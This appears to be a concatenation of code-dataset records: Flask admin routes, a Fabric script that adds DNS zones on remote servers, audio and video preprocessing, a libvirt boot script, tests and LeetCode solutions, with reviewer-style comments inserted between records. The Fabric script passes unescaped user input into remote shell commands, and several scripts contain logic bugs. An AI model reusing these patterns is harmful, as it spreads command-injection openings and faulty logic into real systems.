,data=ProsedurLaporPolsek.query.all(), data2=ProsedurLaporMedcen.query.all())\n\n@app.route('/prosedur/tambah/', methods=['GET','POST'])\n@login_required\ndef prosedurAdd():\n if request.method == 'POST':\n kodePolsek = request.form['kodePolsek']\n if current_user.username == 'polsek':\n laporPolsek = request.files['laporPolsek']\n data = ProsedurLaporPolsek(kodePolsek=kodePolsek, ProsedurLaporPolsek=laporPolsek.filename)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('prosedur'))\n if current_user.username == 'medcen': \n laporMedcen = request.files['laporMedcen']\n data2 = ProsedurLaporMedcen(kodePolsek=kodePolsek, ProsedurLaporMedcen=laporMedcen.filename)\n db.session.add(data2)\n db.session.commit()\n return redirect(url_for('prosedur'))\n else:\n return render_template('prosedur/prosedurAdd.html', title='Tambah Prosedur', submenu='dataProsedur' ,link1='Data Prosedur', link2='Tambah Data Prosedur', link3='polsek/', dataPolsek=Polsek.query.all())\n\n# @app.route('/prosedur//ubah/', methods=['GET','POST'])\n# @login_required\n# def prosedurEdit(id):\n# if current_user.username == 'polsek':\n# data = ProsedurLaporPolsek.query.filter_by(id=id).first()\n# if current_user.username == 'medcen':\n# data2 = ProsedurLaporMedcen.query.filter_by(id=id).first()\n# if request.method == 'POST':\n# if current_user.username == 'polsek':\n# data.kodePolsek = request.form['kodePolsek']\n# data.ProsedurLaporPolsek = request.files['laporPolsek']\n# db.session.commit()\n# return redirect(url_for('prosedur'))\n# if current_user.username == 'medcen':\n# data2.kodePolsek = request.form['kodePolsek']\n# data2.ProsedurLaporMedcen = 
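Two smaller points about the routes above. First, the URL rules have lost their angle-bracket converters (e.g. `'/polsek//hapus/'` was presumably `'/polsek/<kodePolsek>/hapus/'` before the dataset's text extraction stripped the markup), so the view arguments can never bind as written. Second, every delete view calls `.first()` and passes the result straight to `db.session.delete()`, which raises when no row matches. A sketch of one route with both repaired, using Flask-SQLAlchemy's `first_or_404()`; `app`, `db` and `Medcen` mirror the record's imports:

```python
# Restored <int:id> converter plus a 404 guard for the missing-row case.
@app.route('/medcen/<int:id>/hapus/', methods=['GET', 'POST'])
@login_required
def delMedcen(id):
    data = Medcen.query.filter_by(id=id).first_or_404()
    db.session.delete(data)
    db.session.commit()
    return redirect(url_for('medcen'))
```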
request.files['laporMedcen']\n# db.session.commit()\n# return redirect(url_for('prosedur'))\n# else:\n# return render_template('prosedur/prosedurAdd.html', title='Ubah Prosedur', submenu='dataProsedur' ,link1='Data Prosedur', link2='Ubah Data Prosedur', link3='prosedur/', data=data, dataPolsek=Polsek.query.all())\n\n@app.route('/prosedur//hapus/', methods=['GET','POST'])\n@login_required\ndef prosedurDel(id):\n if current_user.username == 'polsek':\n data = ProsedurLaporPolsek.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('prosedur'))\n if current_user.username == 'medcen':\n data2 = ProsedurLaporMedcen.query.filter_by(id=id).first()\n db.session.delete(data2)\n db.session.commit()\n return redirect(url_for('prosedur'))\n\n# # Akhir Polsek\n\n\n# Awal NomorLayanan\n\n@app.route('/nomor_layanan/')\n@login_required\ndef layanan():\n return render_template('layanan/layanan.html', title='Nomor Layanan', submenu='dataNomor Layanan', link1='Data Nomor Layanan' ,data=NomorLayananPolsek.query.all(), data2=NomorLayananMedcen.query.all())\n\n@app.route('/nomor_layanan/tambah/', methods=['GET','POST'])\n@login_required\ndef layananAdd():\n if request.method == 'POST':\n kodePolsek = request.form['kodePolsek']\n if current_user.username == 'polsek':\n layananPolsek = request.form['layananPolsek']\n daruratPolsek = request.form['daruratPolsek']\n data = NomorLayananPolsek(kodePolsek=kodePolsek, NomorLayananPolsek=layananPolsek, NomorDaruratPolsek=daruratPolsek)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('layanan'))\n if current_user.username == 'medcen':\n layananMedcen = request.form['layananMedcen']\n data2 = NomorLayananMedcen(kodePolsek=kodePolsek, NomorLayananMedcen=layananMedcen)\n db.session.add(data2)\n db.session.commit()\n return redirect(url_for('layanan'))\n else:\n return render_template('layanan/layananAdd.html', title='Tambah Nomor Layanan', submenu='dataNomor Layanan' ,link1='Data Nomor Layanan', link2='Tambah Data Nomor Layanan', link3='nomor_layanan/', dataPolsek=Polsek.query.all())\n\n@app.route('/nomor_layanan//ubah/', methods=['GET','POST'])\n@login_required\ndef layananEdit(id):\n data = NomorLayananPolsek.query.filter_by(id=id).first()\n data2 = NomorLayananMedcen.query.filter_by(id=id).first()\n if request.method == 'POST':\n if current_user.username == 'polsek':\n data.kodePolsek = request.form['kodePolsek']\n data.NomorLayananPolsek = request.form['layananPolsek']\n data.NomorDaruratPolsek = request.form['daruratPolsek']\n db.session.commit()\n return redirect(url_for('layanan'))\n if current_user.username == 'medcen':\n data2.kodePolsek = request.form['kodePolsek']\n data2.NomorLayananMedcen = request.form['layananMedcen']\n db.session.commit()\n return redirect(url_for('layanan'))\n else:\n return render_template('layanan/layananAdd.html', title='Ubah Nomor Layanan', submenu='dataNomor Layanan' ,link1='Data Nomor Layanan', link2='Ubah Data Nomor Layanan', link3='nomor_layanan/',data2=data2, data=data, dataPolsek=Polsek.query.all())\n\n@app.route('/nomor_layanan//hapus/', methods=['GET','POST'])\n@login_required\ndef layananDel(id):\n if current_user.username == 'polsek':\n data = NomorLayananPolsek.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('layanan'))\n elif current_user.username == 'medcen':\n data2 = NomorLayananMedcen.query.filter_by(id=id).first()\n db.session.delete(data2)\n db.session.commit()\n return 
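`prosedurAdd()` above records only `laporPolsek.filename` and never writes the uploaded bytes anywhere; it also falls off the end of the POST branch (returning `None`) when the logged-in user is neither `polsek` nor `medcen`. A sketch of persisting the upload first, with `UPLOAD_FOLDER` as an assumed config key not present in the record:

```python
import os
from werkzeug.utils import secure_filename

def save_upload(file_storage, upload_dir):
    """Write a werkzeug FileStorage to disk and return the stored name."""
    name = secure_filename(file_storage.filename)   # sanitise client name
    file_storage.save(os.path.join(upload_dir, name))
    return name
```

Inside the view this would be `fname = save_upload(request.files['laporPolsek'], app.config['UPLOAD_FOLDER'])`, storing `fname` instead of the raw client-supplied filename.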
redirect(url_for('layanan')) \n\n# Akhir NomorLayanan\n\n\n# Awal WebsiteResmi\n\n@app.route('/website_resmi/')\n@login_required\ndef webresmi():\n return render_template('webresmi/webresmi.html', title='Website Resmi', submenu='dataWebsite Resmi', link1='Data Website Resmi' ,data=WebsiteResmiPolsek.query.all(), data2=WebsiteResmiMedcen.query.all())\n\n@app.route('/website_resmi/tambah/', methods=['GET','POST'])\n@login_required\ndef webresmiAdd():\n if request.method == 'POST':\n kodePolsek = request.form['kodePolsek']\n if current_user.username == 'polsek':\n webPolsek = request.form['webPolsek']\n data = WebsiteResmiPolsek(kodePolsek=kodePolsek, WebsiteResmiPolsek=webPolsek)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('webresmi'))\n if current_user.username == 'medcen':\n webMedcen = request.form['webMedcen']\n data2 = WebsiteResmiMedcen(kodePolsek=kodePolsek, WebsiteResmiMedcen=webMedcen)\n db.session.add(data2)\n db.session.commit()\n return redirect(url_for('webresmi'))\n else:\n return render_template('webresmi/webresmiAdd.html', title='Tambah Website Resmi', submenu='dataWebsite Resmi' ,link1='Data Website Resmi', link2='Tambah Data Website Resmi', link3='website_resmi/', dataPolsek=Polsek.query.all())\n\n@app.route('/website_resmi//ubah/', methods=['GET','POST'])\n@login_required\ndef webresmiEdit(id):\n data = WebsiteResmiPolsek.query.filter_by(id=id).first()\n data2 = WebsiteResmiMedcen.query.filter_by(id=id).first()\n if request.method == 'POST':\n if current_user.username == 'polsek':\n data.kodePolsek = request.form['kodePolsek']\n data.WebsiteResmiPolsek = request.form['webPolsek']\n db.session.commit()\n return redirect(url_for('webresmi'))\n if current_user.username == 'medcen':\n data2.kodePolsek = request.form['kodePolsek']\n data2.WebsiteResmiMedcen = request.form['webMedcen']\n db.session.commit()\n return redirect(url_for('webresmi'))\n else:\n return render_template('webresmi/webresmiAdd.html', title='Ubah Website Resmi', submenu='dataWebsite Resmi' ,link1='Data Website Resmi', link2='Ubah Data Website Resmi', link3='website_resmi/',data2=data2, data=data, dataPolsek=Polsek.query.all())\n\n@app.route('/website_resmi//hapus/', methods=['GET','POST'])\n@login_required\ndef webresmiDel(id):\n if current_user.username == 'polsek':\n data = WebsiteResmiPolsek.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('webresmi'))\n elif current_user.username == 'medcen':\n data2 = WebsiteResmiMedcen.query.filter_by(id=id).first()\n db.session.delete(data2)\n db.session.commit()\n return redirect(url_for('webresmi')) \n\n# Akhir WebsiteResmi\n\n\n\n\n\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":17672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"232484475","text":"class Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if s == \"\":\n return 0\n maxLength = 1\n unique = set()\n unique.add(s[0])\n start, end = 0, 1\n while start < len(s) and end < len(s):\n if s[end] in unique:\n unique.remove(s[start])\n start += 1\n else:\n unique.add(s[end])\n end += 1\n maxLength = max(maxLength, end - start)\n\n return 
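The `polsek`/`medcen` branching recurs in every prosedur, layanan and webresmi view above, and a request from any other account again returns `None`. A hypothetical table-driven dispatch collapses the pairs; the model names mirror the record's imports:

```python
from flask import abort
from flask_login import current_user

from .models import NomorLayananMedcen, NomorLayananPolsek  # per the record

ROLE_MODELS = {
    'polsek': NomorLayananPolsek,
    'medcen': NomorLayananMedcen,
}

def model_for_current_role():
    model = ROLE_MODELS.get(current_user.username)
    if model is None:
        abort(403)          # unknown role: fail loudly, never return None
    return model
```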
maxLength\n","sub_path":"leetcode/strings/3.longestsubstringwithoutrepeat.py","file_name":"3.longestsubstringwithoutrepeat.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"543426223","text":"import scipy\nimport numpy as np\nfrom scipy.io import wavfile\nimport scipy.signal\nimport os\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import plot,show,hold,grid\nimport pickle \n\nnp.set_printoptions(threshold=np.inf)\n\n#note: this path needs to be changed to run elsewhere\npath_A_murmur = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Atraining_murmur/\"\npath_A_normal = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Atraining_normal/\"\npath_A_test = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Aunlabelledtest/\"\npath_B_murmur = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Btraining_murmur/\"\npath_B_normal = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Btraining_normal/\"\npath_B_test = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Bunlabelledtest/\"\n\n'''\n1) Read files and convert to vectors\n2) Decimate signal, then apply chebyshev type 1 lowpass filter\n3) Normalize signal to absolute maximum\n'''\n\n\n############ 1) Importing .wav files and collecting translated arrays ############\n\n# labelled training data = murmur/normal, unlabelled data is testing \ntraining_data = []\ntest_data = [] \n\ndata_A_murmur = []\ndata_A_normal = []\ndata_A_test = []\n\ndata_B_murmur = []\ndata_B_normal = []\ndata_B_test = []\n\n# For each differently labelled heartbeat (ie. normal, murmur, etc.), read in files and convert to arrays \n\n# dataset A, murmur \nitems_1 = os.listdir(path_A_murmur)\nfor i in items_1:\n\tif i.endswith(\".wav\"):\n\t#reading wav files, returns tuple of sampling rate and then an array --> we just want the array, not sampling rate\n\t\tsr, arr = scipy.io.wavfile.read(path_A_murmur+i)\n\t\tdata_A_murmur.append(arr)\n\n# dataset A, normal\nitems_2 = os.listdir(path_A_normal)\nfor j in items_2:\n\tif j.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_A_normal+j)\n\t\tdata_A_normal.append(arr)\n\n# dataset A, unlabelled\nitems_3 = os.listdir(path_A_test)\nfor k in items_3:\n\tif k.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_A_test+k)\n\t\tdata_A_test.append(arr)\n\n# dataset B, murmur \nitems_4 = os.listdir(path_B_murmur)\nfor l in items_4:\n\tif l.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_B_murmur+l)\n\t\tdata_B_murmur.append(arr)\n\n# dataset B , normal\nitems_5 = os.listdir(path_B_normal)\nfor m in items_5:\n\tif m.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_B_normal+m)\n\t\tdata_B_normal.append(arr)\n\n# dataset B, unlabelled\nitems_6 = os.listdir(path_B_test)\nfor n in items_6:\n\tif n.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_B_test+n)\n\t\tdata_B_test.append(arr)\n\n\n############ 2) Decimating signal and adding Chebyshev I Filter ############\n\n#following filtering method of (Gomes & Pereira, 2012)\nsig_train = []\nsig_test = []\n#creating chebysev filter\nb, a = scipy.signal.cheby1(5, 5, 0.5, btype='low', output='ba')\n\n#decimating and applying filter\n\nfor s in data_A_murmur:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_train.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_A_normal:\n\tdec_sig = 
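The sliding-window solution that closes above is O(n) amortized but evicts one character at a time. A standard variant keeps a last-seen-index map and jumps `start` directly past the previous occurrence:

```python
# Index-map variant: instead of shrinking the window one character at a
# time, jump `start` straight past the repeated character's last position.
class Solution(object):
    def lengthOfLongestSubstring(self, s):
        last = {}           # char -> most recent index
        start = 0
        best = 0
        for end, ch in enumerate(s):
            if ch in last and last[ch] >= start:
                start = last[ch] + 1
            last[ch] = end
            best = max(best, end - start + 1)
        return best
```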
scipy.signal.decimate(s, 5)\n\tsig_train.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_A_test:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_test.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_B_murmur:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_train.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_B_normal:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_train.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_B_test:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_test.append(scipy.signal.filtfilt(b, a, dec_sig))\n\n\n############ 3) Normalize each signal ############\n# NOTE: sig_test and sig_train is a list of ndarrays (which vary in length based on time of recording)\nfor x in range(len(sig_train)):\n\tsig_train[x] = (sig_train[x]-sig_train[x].min())/(sig_train[x].max()-sig_train[x].min())\n\nfor y in range(len(sig_test)):\n\tsig_test[y] = (sig_test[y]-sig_test[y].min())/(sig_test[y].max()-sig_test[y].min())\n\n\nprint(len(sig_train))\nprint(len(sig_test))\n\npickle_out1 = open(\"training_data.p\", \"wb\")\npickle_out2 = open(\"testing_data.p\", \"wb\")\n\npickle.dump(sig_train, pickle_out1)\npickle.dump(sig_test, pickle_out2)\n\npickle_out1.close()\npickle_out2.close()\n","sub_path":"source/data_preproc.py","file_name":"data_preproc.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"411373204","text":"#!/usr/bin/env python2.7\n\nimport sys\nimport os\nimport jinja2\n\nfrom fabric.api import *\nfrom fabric.tasks import execute\nimport getpass\n\ntemplateLoader = jinja2.FileSystemLoader( searchpath=\"/\" )\ntemplateEnv = jinja2.Environment( loader=templateLoader )\nTEMPMZFILE = os.getcwd()+'/jinja2temps/fmnewzone.conf'\nTEMPSZFILE = os.getcwd()+'/jinja2temps/fsnewzone.conf'\nTEMPDOMFILE = os.getcwd()+'/jinja2temps/mszone.conf'\n\ntempmz = templateEnv.get_template( TEMPMZFILE )\ntempsz = templateEnv.get_template( TEMPSZFILE )\ntempdom = templateEnv.get_template( TEMPDOMFILE )\n\nenv.roledefs = {\n 'dns': [str(raw_input('Please enter NS1 IP address: ')), str(raw_input('Please enter NS2 IP address: '))]\n}\n\nenv.user = raw_input('Please enter username for UNIX/Linux server: ')\nenv.password = getpass.getpass()\n\nprint('1. Please write domain name and click Enter button.')\nprint('2. 
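Three notes on the heartbeat-preprocessing script that ends above: the header comment promises normalisation "to absolute maximum" while the code actually min-max scales to [0, 1]; `scipy.signal.decimate` already applies an order-8 Chebyshev type I anti-aliasing filter by default, so the explicit `cheby1`/`filtfilt` pass is a second filtering stage (kept below to match the record); and the six copy-pasted loops collapse into two helpers:

```python
import os
import scipy.signal
from scipy.io import wavfile

def load_wavs(path):
    """Read every .wav under `path`, discarding the sample rate."""
    return [wavfile.read(os.path.join(path, f))[1]
            for f in os.listdir(path) if f.endswith('.wav')]

def preprocess(signals, b, a, q=5):
    """Decimate, apply the record's extra cheby1 pass, min-max scale."""
    out = []
    for s in signals:
        dec = scipy.signal.decimate(s, q)
        filt = scipy.signal.filtfilt(b, a, dec)
        out.append((filt - filt.min()) / (filt.max() - filt.min()))
    return out
```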
For exit, write 2 and click Enter button: ')\nent = raw_input('Write your choose: ')\n\ncbconf = '/etc/named.conf'\ncbindpath = '/etc/namedb'\nfbconf = '/usr/local/etc/namedb/named.conf'\nfbindpath = '/usr/local/etc/namedb'\ndef domainchecker(conf):\n if server == env.roledefs['dns'][0]:\n fzonename = run('cat '+conf+' | grep '+ent+' | head -1 | awk \\'{ print $2 }\\' | sed \\'s/\"//g\\'')\n fzonefile = run('cat '+conf+' | grep '+ent+' | tail -1 | awk \\'{ print $2 }\\' | sed \\'s/\"//g;s/;//g\\' | awk -F/ \\'{print $NF}\\' | cut -f1,2 -d\\'.\\'')\n if ent == fzonename and fzonefile == ent:\n print(' Entered domain name '+ent+' already exists on the NS1 '+env.roledefs['dns'][0]+' server!!!')\n print(' If you want add new record for this '+ent+' domain name, please use ./python-add-record.py script.')\n sys.exit()\n else:\n pass\n\ndef writemzone(bindpath, conf):\n tempmzVars = { \"ns1\" : env.roledefs['dns'][0], \"ns2\" : env.roledefs['dns'][1], \"domain\" : ent, \"bdpath\" : bindpath }\n outputmzText = tempmz.render( tempmzVars )\n outputdomText = tempdom.render( tempmzVars )\n if server == env.roledefs['dns'][0]:\n with open(\"zone_\"+env.roledefs['dns'][0]+\".conf\", \"wb\") as ns1zone:\n ns1zone.write(outputmzText)\n with open(ent+\".zone\", \"wb\") as masdom:\n masdom.write(outputdomText)\n print(\"This is NS1 \"+env.roledefs['dns'][0]+\" server\")\n put('zone_'+env.roledefs['dns'][0]+'.conf', ''+bindpath+'')\n put(ent+'.zone', ''+bindpath+'/master/')\n run('cat '+bindpath+'/zone_'+env.roledefs['dns'][0]+'.conf >> '+conf+'')\n run('service named restart')\n\ndef writeszone(bindpath, conf):\n tempszVars = { \"ns1\" : env.roledefs['dns'][0], \"domain\" : ent, \"bdpath\" : bindpath}\n outputszText = tempsz.render( tempszVars )\n if server == env.roledefs['dns'][1]:\n with open(\"zone_\"+env.roledefs['dns'][1]+\".conf\", \"wb\") as ns2zone:\n ns2zone.write(outputszText)\n print(\"This is NS2 \"+env.roledefs['dns'][1]+\" server\")\n put('zone_'+env.roledefs['dns'][1]+'.conf', ''+bindpath+'')\n #print(\"File copied to NS2 -> \"+env.roledefs['dns'][1]+\" server\")\n run('cat '+bindpath+'/zone_'+env.roledefs['dns'][1]+'.conf >> '+conf+'')\n run('service named restart')\n\ndef checkservice():\n print(' DNS service is not working!!!')\n print(' To install DNS bind please use, ./python-ms-sl-dns.py script. 
')\n sys.exit()\n\nfor server in env.roledefs['dns']:\n env.host_string = server\n with settings(\n hide('warnings', 'running', 'stdout', 'stderr'),\n warn_only=True\n ):\n osver = run('uname -s')\n lintype = run('cat /etc/redhat-release | awk \\'{ print $1 }\\'')\n ftype = run('uname -v | awk \\'{ print $2 }\\' | cut -f1 -d \\'.\\'')\n if osver == 'FreeBSD' and ftype >= 10:\n getfbindpack = run('which named')\n bindfpidfile = run('cat /var/run/named/pid')\n bindfpid = run('ps waux | grep named | grep -v grep | awk \\'{ print $2 }\\'')\n if getfbindpack == '/usr/local/sbin/named' and bindfpid == bindfpidfile:\n domainchecker(fbconf)\n\n if ent != 2 and len(ent) > 4:\n writemzone(fbindpath, fbconf)\n writeszone(fbindpath, fbconf)\n else:\n print(\"\\nMinimal symbol count must be 4.\")\n sys.exit()\n else:\n checkservice()\n\n elif osver == 'Linux' and lintype == 'CentOS':\n getlbindpack = run('which named')\n bindlpidfile = run('cat /var/run/named/named.pid')\n bindlpid = run('ps waux|grep named | grep -v grep | awk \\'{ print $2 }\\'')\n if getlbindpack == '/usr/sbin/named' and bindlpidfile == bindlpid:\n domainchecker(cbconf)\n if ent != 2 and len(ent) > 4:\n writemzone(cbindpath, cbconf)\n writeszone(cbindpath, cbconf)\n else:\n print(\"\\nMinimal symbol count must be 4.\")\n sys.exit()\n else:\n checkservice()\n else:\n print(\"The script is not determine server type. For this reason you cannot use this script.\")\n","sub_path":"python-add-zone.py","file_name":"python-add-zone.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"389333586","text":"#!/usr/bin/env python\n#\n# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"Munki catalogs module tests.\"\"\"\n\nimport logging\n\nfrom google.apputils import app\nfrom tests.simian.mac.common import test\nfrom simian.mac.munki.handlers import catalogs\n\n\nclass CatalogsHandlersTest(test.RequestHandlerTest):\n\n def GetTestClassInstance(self):\n return catalogs.Catalogs()\n\n def GetTestClassModule(self):\n return catalogs\n\n def testGetSuccess(self):\n \"\"\"Tests Catalogs.get().\"\"\"\n name = 'goodname'\n self.MockDoAnyAuth()\n catalog = self.MockModelStatic(\n 'Catalog', 'MemcacheWrappedGet', name, 'plist_xml')\n self.response.headers['Content-Type'] = 'text/xml; charset=utf-8'\n self.response.out.write(catalog).AndReturn(None)\n\n self.mox.ReplayAll()\n self.c.get(name)\n self.mox.VerifyAll()\n\n def testGet404(self):\n \"\"\"Tests Catalogs.get() where name is not found.\"\"\"\n name = 'badname'\n self.MockDoAnyAuth()\n self.MockModelStaticBase(\n 'Catalog', 'MemcacheWrappedGet', name, 'plist_xml').AndReturn(None)\n self.response.set_status(404).AndReturn(None)\n\n self.mox.ReplayAll()\n self.c.get(name)\n self.mox.VerifyAll()\n\n\nlogging.basicConfig(filename='/dev/null')\n\n\ndef main(unused_argv):\n test.main(unused_argv)\n\n\nif __name__ == '__main__':\n 
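Two comparisons in the zone-adding script above are string-versus-int: `ent != 2` is always true because `raw_input` returns a string, so typing `2` never takes the advertised exit path, and `ftype >= 10` orders a string against an int (legal under Python 2's arbitrary ordering, but not a version check). The `len(ent) > 4` test also contradicts the printed "minimal symbol count must be 4". A corrected sketch of the guards:

```python
import sys

def validate_choice(ent):
    """Handle the menu input from raw_input (always a string)."""
    if ent == '2':                  # the advertised exit option
        sys.exit(0)
    if len(ent) < 4:                # agree with the printed "must be 4" rule
        print("\nMinimal symbol count must be 4.")
        sys.exit(1)
    return ent

def is_freebsd_10_plus(osver, ftype):
    return osver == 'FreeBSD' and int(ftype) >= 10   # numeric comparison
```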
app.run()\n","sub_path":"src/tests/simian/mac/munki/handlers/catalogs_test.py","file_name":"catalogs_test.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124490937","text":"# consider the rotate case\n# total 26 chars\nimport collections\nclass Solution(object):\n def groupStrings(self, strings):\n \"\"\"\n :type strings: List[str]\n :rtype: List[List[str]]\n \"\"\"\n offsets = collections.defaultdict(list)\n for s in strings:\n if len(s) == 1:\n offsets['single'].append(s)\n else:\n offset = []\n for i in range(1, len(s)):\n \n offset.append((ord(s[i]) - ord(s[i-1])) % 26)\n offset = tuple(offset)\n offsets[offset].append(s)\n return offsets.values()\n \n \n \n","sub_path":"group-shifted-strings/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"7347396","text":"import cv2\r\nimport os\r\nfrom multiprocessing import Pool\r\nimport sys\r\n\r\ndirectory = sys.argv[1]\r\nos.mkdir(directory+\"../frames\")\r\ndef mk_frames(vid):\r\n print(vid)\r\n if(vid[-3:] != \"avi\"):\r\n return\r\n global directory\r\n os.mkdir(directory+'../frames/'+vid[:-4])\r\n\r\n cap = cv2.VideoCapture(directory+\"/\"+vid)\r\n i = 0\r\n ret = True\r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret == False:\r\n break\r\n cv2.imwrite(directory+'../frames'+'/'+vid[:-4]+'/'+str(i)+'.jpg',frame)\r\n i+=1\r\n\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n os.remove(directory+\"/\"+vid)\r\n\r\np = Pool(int(sys.argv[2]))\r\nfile_list = os.listdir(directory)\r\np.map(mk_frames,file_list)\r\n","sub_path":"save_frames.py","file_name":"save_frames.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"88059894","text":"# the variable \"args\" is already defined\nfrom typing import List\n\nmy_list = [] # your code here\nimport sys\n# arg = sys.argv\narg = args\nfor i in range(len(arg) - 1):\n my_list.append(int(arg[i+1]))\nprint(my_list)\n\n# further code of the script \"process_four_numbers.py\"","sub_path":"Problems/Types/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199644538","text":"#!/usr/bin/env python\n\nimport argparse\nimport xml.etree.ElementTree as ET\n\nimport libvirt\n\nDOMAIN = 'ramdisk'\n\nKERNEL = '/home/pshchelo/images/tinyipa/latest/tinyipa-master.vmlinuz'\nINITRAMFS = '/home/pshchelo/images/tinyipa/latest/ansible-tinyipa-master.gz'\nKERNEL_OPTS = ' '.join(['ipa-standalone=1',\n 'nofb nomodeset',\n 'vga=normal',\n 'console=ttyS0',\n 'systemd.journald.forward_to_console=yes'])\n\n\ndef restart_to_kernel(domain, kernel, initrd):\n domain.destroy()\n xml = ET.fromstring(domain.XMLDesc())\n os = xml.find('os')\n kernel_el = ET.SubElement(os, 'kernel')\n kernel_el.text = kernel\n initrd_el = ET.SubElement(os, 'initrd')\n initrd_el.text = initrd\n cmdline_el = ET.SubElement(os, 'cmdline')\n cmdline_el.text = KERNEL_OPTS\n conn.createXML(ET.tostring(xml))\n\n\ndef restart_to_hdd(domain):\n domain.destroy()\n xml = ET.fromstring(domain.XMLDesc())\n os = xml.find('os')\n for el_name in ('kernel', 'initrd', 'cmdline'):\n el = ET.SubElement(os, el_name)\n os.remove(el)\n kernel_el = ET.SubElement(os, 'kernel')\n os.remove(kernel_el)\n initrd_el = ET.SubElement(os, 
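A tidied sketch of the frame-extraction worker in `save_frames.py` above: `endswith()` instead of slicing (the original's `vid[-3:] != "avi"` misses `.AVI`), `os.path.join` instead of string concatenation, and the destructive `os.remove` of the source video made opt-in:

```python
import os
import cv2

def mk_frames(vid, src_dir, out_dir, delete_source=False):
    if not vid.lower().endswith('.avi'):
        return
    frame_dir = os.path.join(out_dir, os.path.splitext(vid)[0])
    if not os.path.isdir(frame_dir):
        os.makedirs(frame_dir)
    cap = cv2.VideoCapture(os.path.join(src_dir, vid))
    i = 0
    while True:
        ret, frame = cap.read()
        if not ret:                         # end of stream or read failure
            break
        cv2.imwrite(os.path.join(frame_dir, '%d.jpg' % i), frame)
        i += 1
    cap.release()
    if delete_source:                       # original deleted unconditionally
        os.remove(os.path.join(src_dir, vid))
```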
'initrd')\n os.remove(initrd_el)\n cmdline_el = ET.SubElement(os, 'cmdline')\n os.remove(cmdline_el)\n conn.createXML(ET.tostring(xml))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('target', type=str, choices=['direct', 'hdd'],\n help='Set boot mode and restart.')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n conn = libvirt.open()\n domain = conn.lookupByName(DOMAIN)\n if args.target == 'direct':\n restart_to_kernel(domain, KERNEL, INITRAMFS)\n elif args.target == 'hdd':\n restart_to_hdd(domain)\n conn.close()\n","sub_path":"scripts/ramdisk-mgmt.py","file_name":"ramdisk-mgmt.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124178606","text":"import configparser\nimport os\nimport json\nfrom .messages import *\nfrom uuid import *\n#PATH PARA CONECTAR ALA BASE DE DATOS ESTA ESPERANDO UN ARCHIVO .INI\nDEBUGAPP=False\n\nDB_PATH=\"\"\n\nclass ERROR:\n \"\"\"Clase para capturar los errores\"\"\"\n def __init__(self,err=False,msgg=\"\"):\n self.err = err\n self.msgg = msgg\n \n def InitialERR(self):\n \"\"\"Inicializa las variables errores\"\"\"\n 